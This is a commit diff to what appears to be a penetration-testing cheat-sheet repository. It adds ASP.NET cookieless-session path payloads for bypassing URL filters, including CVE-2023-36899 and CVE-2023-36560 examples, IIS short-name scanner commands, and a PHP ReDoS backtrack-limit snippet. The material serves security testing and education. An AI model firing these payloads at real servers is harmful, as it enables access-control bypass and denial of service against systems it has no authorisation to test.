ASP Cookieless + ReDOS backtrack

This commit is contained in:
Swissky 2024-05-29 23:23:51 +02:00
parent 67adf75bc2
commit ded1d95735
2 changed files with 75 additions and 7 deletions

View file

@ -14,6 +14,7 @@
* [UNC Bypass](#unc-bypass)
* [NGINX/ALB Bypass](#nginxalb-bypass)
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
* [IIS Short Name](#iis-short-name)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#interesting-linux-files)
* [Interesting Windows files](#interesting-windows-files)
@ -104,18 +105,55 @@ To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
### ASPNET Cookieless Bypass
### ASP NET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
| .NET Version | URI |
| -------------- | -------------------------- |
| V1.0, V1.1 | /(XXXXXXXX)/ |
| V2.0+ | /(S(XXXXXXXX))/ |
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+ | ... |
We can use this behavior to bypass filtered URLs.
```powershell
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
/(S(X))/admin/(S(X))/main.aspx
* If your application is in the main folder
```ps1
/(S(X))/
/(Y(Z))/
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/
/(S(X))/admin/(S(X))/main.aspx
/(S(x))/b/(S(x))in/Navigator.dll
```
* If your application is in a subfolder
```ps1
/MyApp/(S(X))/
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
```
| CVE | Payload |
| -------------- | ---------------------------------------------- |
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
### IIS Short Name
* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)
```ps1
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
```
@ -236,3 +274,4 @@ The following log files are controllable and can be included with an evil payloa
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))

View file

@ -30,7 +30,36 @@ Evil Regex contains:
These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
### Backtrack Limit
Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings.
PHP PCRE configuration options
| Name | Default | Note |
|----------------------|---------|---------|
| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`|
| pcre.recursion_limit | 100000 | / |
| pcre.jit | 1  | / |
Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false:
```php
$pattern = '/(a+)+$/';
$subject = str_repeat('a', 1000) . 'b';
if (preg_match($pattern, $subject)) {
echo "Match found";
} else {
echo "No match";
}
```
## References
* [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)
* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)